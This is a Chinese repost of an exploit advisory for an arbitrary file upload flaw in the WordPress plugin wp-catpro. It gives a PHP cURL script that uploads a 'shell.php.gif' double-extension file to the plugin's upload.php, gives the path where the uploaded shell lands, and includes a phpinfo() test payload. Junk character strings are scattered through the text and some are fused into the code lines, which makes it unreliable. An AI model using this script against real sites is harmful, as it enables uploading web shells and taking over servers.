WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
. [) s) N' H8 k5 r* U+ R#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
/ O  A, n) m! m' b
#=> Exploit 信息:
------------------
) _% R* @/ r  Z: E# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
( |3 Z- J# i3 g: M6 r# m: X7 Z# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 b+ ?5 y  W/ G5 L) ~+ C% y6 b# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
" Y. \9 P0 w8 I1 u) l------------------
1 |0 h3 R0 R, R) Z8 R
#=> Exploit
& B) P8 }* y  _" y' r3 b( X-----------
<?php
" X2 a7 h. l/ d& y( x0 w, x
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
8 @. K3 D* w: q) e% ocurl_setopt($ch, CURLOPT_POST, true);
8 Y+ S* o& p6 H$ ]! hcurl_setopt($ch, CURLOPT_POSTFIELDS,
! x/ ]  g, I+ O  h: A8 e* farray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1 \8 E: i. u) o; \7 i$ r0 e4 o$postResult = curl_exec($ch);
/ I: X5 C6 O3 g% ~curl_close($ch);
/ V" s% o% A7 Y7 D/ L! K; V
3 W1 s% P8 N& b( q& J8 N. cprint "$postResult";
# D7 ]) ?( S! ?1 `
! u" V. ^1 L- TShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
2 Q' H' B! u4 |3 j: o+ G?>